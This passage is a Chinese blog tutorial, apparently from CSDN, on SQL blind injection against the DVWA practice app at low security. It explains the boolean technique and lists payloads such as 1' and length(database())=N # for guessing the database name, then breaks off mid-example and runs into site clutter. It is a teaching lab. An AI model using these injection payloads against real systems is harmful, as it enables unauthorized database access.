你不知道的20万sql盲注(速来)

本文深入探讨了SQL盲注的基础知识,通过实际案例展示了如何利用布尔盲注和时间盲注技术,逐步猜解数据库名称、表名、字段名以及数据内容。在低安全级别设置下,通过在DVWA平台进行实验,揭示了SQL注入的潜在危险,并提供了详细的猜解过程。
摘要由CSDN通过智能技术生成

1盲注基础sql实验

cet 192.168.121.1

win 192.168.121.2

首先登入cet 进入数据库

然后在mysql客户端输入以下命令

use dvwa ;

得到当前数据库名称

select database();

得到截取当前数据库第一个字符

select substr(database(),1,1));

得到截取当前数据库的第一个字符的asscii

select ascii(substr(database(),1,1));

得到截取当前数据库的第一个字符的ascii值是否大于97

 然在盲注情况下,从页面上只能判断1,0的情况,那么我们可以对databae()的结果截取一个字符,转换成ascii后进行运算,根据true或false的结果确认截取的这个字符的ASCII码,然后在将这个ascii码转换成字符,从而得到database()里面的第一个值。依次类推,得到所有结果

接着登陆浏览器访问dvwa 192.168.121.1

默认用户admin密码password

开始盲注

把dvwa设置成安全low级别

 点击sql(blind)

查看源码

 可以看到,Low级别的代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种,‘User ID exists in the database’与‘User ID is MISSING from the database.’,因此这里是SQL盲注漏洞

1:布尔盲注

判断是否存在注入,注入是字符型还是数字型 输入1 显示相应用户存在

输入1' and 1=1 # 显示存在

 输入1’ and 1=2 # 显示存在

 说明存在字符型的sql盲注

1:猜解当前数据库

输入1’ and length(database())=1 #,显示不存在;

输入1’ and length(database())=2 #,显示不存在;

输入1’ and length(database())=3 #,显示不存在;

输入1’ and length(database())=

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

my‘name 卢本伟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值